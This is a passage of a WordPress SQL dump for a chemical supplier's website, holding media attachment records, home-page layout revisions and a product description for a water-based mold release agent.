INSERT INTO `wp_posts` VALUES (1447, 2, '2016-09-09 17:10:51', '2016-09-09 17:10:51', '', 'releasys-8500-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-8500-semi-permanent-mold-release', '', '', '2016-09-09 17:10:51', '2016-09-09 17:10:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-8500-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1448, 2, '2016-09-09 17:10:59', '2016-09-09 17:10:59', '', 'releasys-8800-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-8800-semi-permanent-mold-release', '', '', '2016-09-09 17:10:59', '2016-09-09 17:10:59', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-8800-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1449, 2, '2016-09-09 17:11:08', '2016-09-09 17:11:08', '', 'releasys-8900-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-8900-semi-permanent-mold-release', '', '', '2016-09-09 17:11:08', '2016-09-09 17:11:08', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-8900-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1450, 2, '2016-09-09 17:11:15', '2016-09-09 17:11:15', '', 'teflon-heavy-equipment-grease', '', 'inherit', 'open', 'closed', '', 'teflon-heavy-equipment-grease', '', '', '2016-09-09 17:11:15', '2016-09-09 17:11:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-heavy-equipment-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1451, 2, '2016-09-09 17:11:23', '2016-09-09 17:11:23', '', 'teflon-heavy-equipment-grease-t', '', 'inherit', 'open', 'closed', '', 'teflon-heavy-equipment-grease-t', '', '', '2016-09-09 17:11:23', '2016-09-09 17:11:23', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-heavy-equipment-grease-t.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1452, 2, '2016-09-09 17:11:30', '2016-09-09 17:11:30', '', 'teflon-high-temp-grease', '', 'inherit', 'open', 'closed', '', 'teflon-high-temp-grease', '', '', '2016-09-09 17:11:30', '2016-09-09 17:11:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-high-temp-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1453, 2, '2016-09-09 17:11:38', '2016-09-09 17:11:38', '', 'teflon-high-temp-grease-t', '', 'inherit', 'open', 'closed', '', 'teflon-high-temp-grease-t', '', '', '2016-09-09 17:11:38', '2016-09-09 17:11:38', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-high-temp-grease-t.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1454, 2, '2016-09-09 17:11:47', '2016-09-09 17:11:47', '', 'teflon-marine-grease', '', 'inherit', 'open', 'closed', '', 'teflon-marine-grease', '', '', '2016-09-09 17:11:47', '2016-09-09 17:11:47', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-marine-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1455, 2, '2016-09-09 17:11:54', '2016-09-09 17:11:54', '', 'teflon-multi-use-lubricant', '', 'inherit', 'open', 'closed', '', 'teflon-multi-use-lubricant', '', '', '2016-09-09 17:11:54', '2016-09-09 17:11:54', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-multi-use-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1456, 2, '2016-09-09 17:12:02', '2016-09-09 17:12:02', '', 'teflon-multi-use-quart', '', 'inherit', 'open', 'closed', '', 'teflon-multi-use-quart', '', '', '2016-09-09 17:12:02', '2016-09-09 17:12:02', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-multi-use-quart.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1457, 2, '2016-09-09 17:12:11', '2016-09-09 17:12:11', '', 'teflon-severe-service-grease', '', 'inherit', 'open', 'closed', '', 'teflon-severe-service-grease-2', '', '', '2016-09-09 17:12:11', '2016-09-09 17:12:11', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-severe-service-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1458, 2, '2016-09-09 17:12:18', '2016-09-09 17:12:18', '', 'teflon-silicone-lubricant', '', 'inherit', 'open', 'closed', '', 'teflon-silicone-lubricant', '', '', '2016-09-09 17:12:18', '2016-09-09 17:12:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-silicone-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1459, 2, '2016-09-09 17:12:27', '2016-09-09 17:12:27', '', 'teflon-white-lithium-grease', '', 'inherit', 'open', 'closed', '', 'teflon-white-lithium-grease-2', '', '', '2016-09-09 17:12:27', '2016-09-09 17:12:27', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-white-lithium-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1460, 2, '2016-09-09 17:12:36', '2016-09-09 17:12:36', '', 'teflon-white-lithium-grease-c', '', 'inherit', 'open', 'closed', '', 'teflon-white-lithium-grease-c', '', '', '2016-09-09 17:12:36', '2016-09-09 17:12:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-white-lithium-grease-c.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1461, 2, '2016-09-09 17:12:45', '2016-09-09 17:12:45', '', 'teflon-white-lithium-grease-t', '', 'inherit', 'open', 'closed', '', 'teflon-white-lithium-grease-t', '', '', '2016-09-09 17:12:45', '2016-09-09 17:12:45', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-white-lithium-grease-t.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1462, 2, '2016-09-09 17:12:53', '2016-09-09 17:12:53', '', 'hexion-epikure-3140-curing-agent', '', 'inherit', 'open', 'closed', '', 'hexion-epikure-3140-curing-agent', '', '', '2016-09-09 17:12:53', '2016-09-09 17:12:53', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-epikure-3140-curing-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1463, 2, '2016-09-09 17:13:01', '2016-09-09 17:13:01', '', 'hexion-epon-resin-826', '', 'inherit', 'open', 'closed', '', 'hexion-epon-resin-826', '', '', '2016-09-09 17:13:01', '2016-09-09 17:13:01', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-epon-resin-826.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1464, 2, '2016-09-09 17:13:09', '2016-09-09 17:13:09', '', 'hexion-epon-resin-828', '', 'inherit', 'open', 'closed', '', 'hexion-epon-resin-828', '', '', '2016-09-09 17:13:09', '2016-09-09 17:13:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-epon-resin-828.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1465, 2, '2016-09-09 17:13:18', '2016-09-09 17:13:18', '', 'hexion-epon-resin-862', '', 'inherit', 'open', 'closed', '', 'hexion-epon-resin-862', '', '', '2016-09-09 17:13:18', '2016-09-09 17:13:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-epon-resin-862.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1466, 2, '2016-09-09 17:13:26', '2016-09-09 17:13:26', '', 'hexion-epon-resin-8021', '', 'inherit', 'open', 'closed', '', 'hexion-epon-resin-8021', '', '', '2016-09-09 17:13:26', '2016-09-09 17:13:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-epon-resin-8021.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1467, 2, '2016-09-09 17:13:34', '2016-09-09 17:13:34', '', 'hexion-heloxy-modifier-67', '', 'inherit', 'open', 'closed', '', 'hexion-heloxy-modifier-67', '', '', '2016-09-09 17:13:34', '2016-09-09 17:13:34', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-heloxy-modifier-67.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1468, 2, '2016-09-09 17:13:44', '2016-09-09 17:13:44', '', 'releasys-8200-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-8200-semi-permanent-mold-release', '', '', '2016-09-09 17:13:44', '2016-09-09 17:13:44', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-8200-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1469, 2, '2016-09-09 17:13:51', '2016-09-09 17:13:51', '', 'teflon-silicone-lubricant-quart', '', 'inherit', 'open', 'closed', '', 'teflon-silicone-lubricant-quart', '', '', '2016-09-09 17:13:51', '2016-09-09 17:13:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-silicone-lubricant-quart.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1470, 3, '2016-09-09 17:30:28', '2016-09-09 17:30:28', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="medical-chemicals" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-09 17:30:28', '2016-09-09 17:30:28', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1471, 2, '2016-09-09 17:30:52', '2016-09-09 17:30:52', '', 'teflon-severe-service-grease (2)', '', 'inherit', 'open', 'closed', '', 'teflon-severe-service-grease-2-2', '', '', '2016-09-09 17:30:52', '2016-09-09 17:30:52', '', 1104, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/teflon-severe-service-grease-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1472, 3, '2016-09-09 17:31:56', '2016-09-09 17:31:56', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-09 17:31:56', '2016-09-09 17:31:56', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1473, 3, '2016-09-09 17:34:52', '2016-09-09 17:34:52', '', 'VazoR General Information - PUSH (1)', '', 'inherit', 'open', 'closed', '', 'vazor-general-information-push-1', '', '', '2016-09-09 17:34:52', '2016-09-09 17:34:52', '', 568, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VazoR-General-Information-PUSH-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1474, 3, '2017-06-04 18:03:22', '2017-06-04 18:03:22', '<h2>ReleaSys™ 88 | Water-based Mold Release Agent</h2>\n<h3>High Performance Chemistry; Eco-Friendly, Water-based mold release agent</h3>\nReleaSys™ 88 is a semi-permanent, high performance water-based mold release agent developed to yield unmatched durability and surface slip. This aerosolized formulation excels at releasing parts from complex, intricate mold geometries. Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. ReleaSys 88 Water-based Mold Release Agent will not interfere with post-production finishing operation. Benefits of this product include:\n<ul>\n 	<li>High Slip; Superior release agent durability</li>\n 	<li>Ideal for complex molds and substrates</li>\n 	<li>Minimizes mold build-up and fouling</li>\n 	<li>Clean, Non-oily, Non-migrating</li>\n</ul>\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Semi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.</span>\n<h3 style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;">Numerous Releases per Application in the con</h3>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">The application efficiency of ReleaSys can be seen by the relatively small amounts of mold release agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spend years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.</span></p>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a></p>\n<a href="https://www.miller-stephenson.com/mold-release-agents/">For a guide on which Release agent systems are right for you click here</a>', 'ReleaSys™ 88 | Water-based Mold Release Agent', 'ReleaSys 88 is a high performance water-based, semi-permanent mold release system developed to yield unmatched durability and surface slip. This aerosolized formulation excels at releasing parts from complex, intricate mold geometries. Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. ReleaSys 88 will not interfere with post-production finishing operation. Benefits of this product include:\n<ul>\n 	<li>High Slip; Superior release agent durability</li>\n 	<li>Ideal for complex molds and substrates</li>\n 	<li>Minimizes mold build-up and fouling</li>\n 	<li>Water-based formulation</li>\n 	<li>Clean, Non-oily, Non-migrating</li>\n</ul>', 'inherit', 'closed', 'closed', '', '423-autosave-v1', '', '', '2017-06-04 18:03:22', '2017-06-04 18:03:22', '', 423, 'https://132.148.10.86/wordpress/423-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1480, 1, '2016-09-10 13:55:27', '2016-09-10 13:55:27', '[displayProduct id="1478"]', 'Product Listing', '', 'publish', 'closed', 'closed', '', 'product-listing', '', '', '2016-09-10 15:38:57', '2016-09-10 15:38:57', '', 0, 'https://132.148.10.86/wordpress/?page_id=1480', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (1481, 1, '2016-09-10 13:55:27', '2016-09-10 13:55:27', ' ', '', '', 'publish', 'closed', 'closed', '', '1481', '', '', '2016-09-10 13:55:27', '2016-09-10 13:55:27', '', 0, 'https://132.148.10.86/wordpress/1481/', 6, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (1482, 1, '2016-09-10 13:55:27', '2016-09-10 13:55:27', '[displayProduct id="1478"]', 'Product Listing', '', 'inherit', 'closed', 'closed', '', '1480-revision-v1', '', '', '2016-09-10 13:55:27', '2016-09-10 13:55:27', '', 1480, 'https://132.148.10.86/wordpress/1480-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1486, 1, '2016-09-10 15:37:24', '2016-09-10 15:37:24', '[displayProduct id="1478"]', 'Product Listing', '', 'inherit', 'closed', 'closed', '', '1480-autosave-v1', '', '', '2016-09-10 15:37:24', '2016-09-10 15:37:24', '', 1480, 'https://132.148.10.86/wordpress/1480-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1487, 1, '2016-09-10 15:47:47', '2016-09-10 15:47:47', '', 'Product Listing', '', 'publish', 'closed', 'closed', '', 'product-listing', '', '', '2016-09-10 19:34:31', '2016-09-10 19:34:31', '', 0, 'https://132.148.10.86/wordpress/?post_type=dp_template&#038;p=1487', 0, 'dp_template', '', 0); 
INSERT INTO `wp_posts` VALUES (1490, 1, '2016-09-11 15:49:54', '2016-09-11 15:49:54', '[ux_banner_grid height="400"]\n\n[row]\n\n[col]\n\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width__sm="60" padding="30px 30px 30px 30px" bg="#002c56" depth="1"]\n\n<p>&nbsp;</p>\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\n[button text="MORE" style="primary alt-button" size="normal" link="about"]\n\n\n[/text_box]\n\n[/ux_banner]\n[ux_banner height="10px"]\n\n[text_box width="80" width__sm="60" animate="fadeIn"]\n\n\n[/text_box]\n\n[/ux_banner]\n[ux_banner height="240px" bg="86" hover="zoom" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="40" width__sm="60" animate="fadeIn" position_x="100" position_y="0" text_align="right"]\n\n[button text="RELEASE AGENTS" style="primary" link="chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col]\n\n[ux_banner height="400px" bg="78" hover="zoom" link="chemicals/krytox/"]\n\n[text_box width="40" width__sm="60" animate="fadeIn" position_x="100" position_y="0" text_align="right"]\n\n[button text="KRYTOX™\r\n&amp; LUBRICANTS" style="primary" size="medium" link="chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col]\n\n[ux_banner height="195px" bg="11" hover="zoom" link="chemicals/solvents/"]\n\n[text_box width="40" width__sm="60" animate="fadeIn" position_x="100" position_y="0" text_align="right"]\n\n[button text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" style="primary" size="medium" link="chemicals/solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[ux_banner height="10px"]\n\n[text_box width="80" width__sm="60" animate="fadeIn"]\n\n\n[/text_box]\n\n[/ux_banner]\n[ux_banner height="195px" bg="7" hover="zoom" link="chemicals/conformal-coatings/"]\n\n[text_box width="40" width__sm="60" animate="fadeIn" position_x="100" position_y="0" text_align="right"]\n\n[button text="EPOXY\r\n&amp; CONFORMAL COATINGS" style="primary" size="medium" 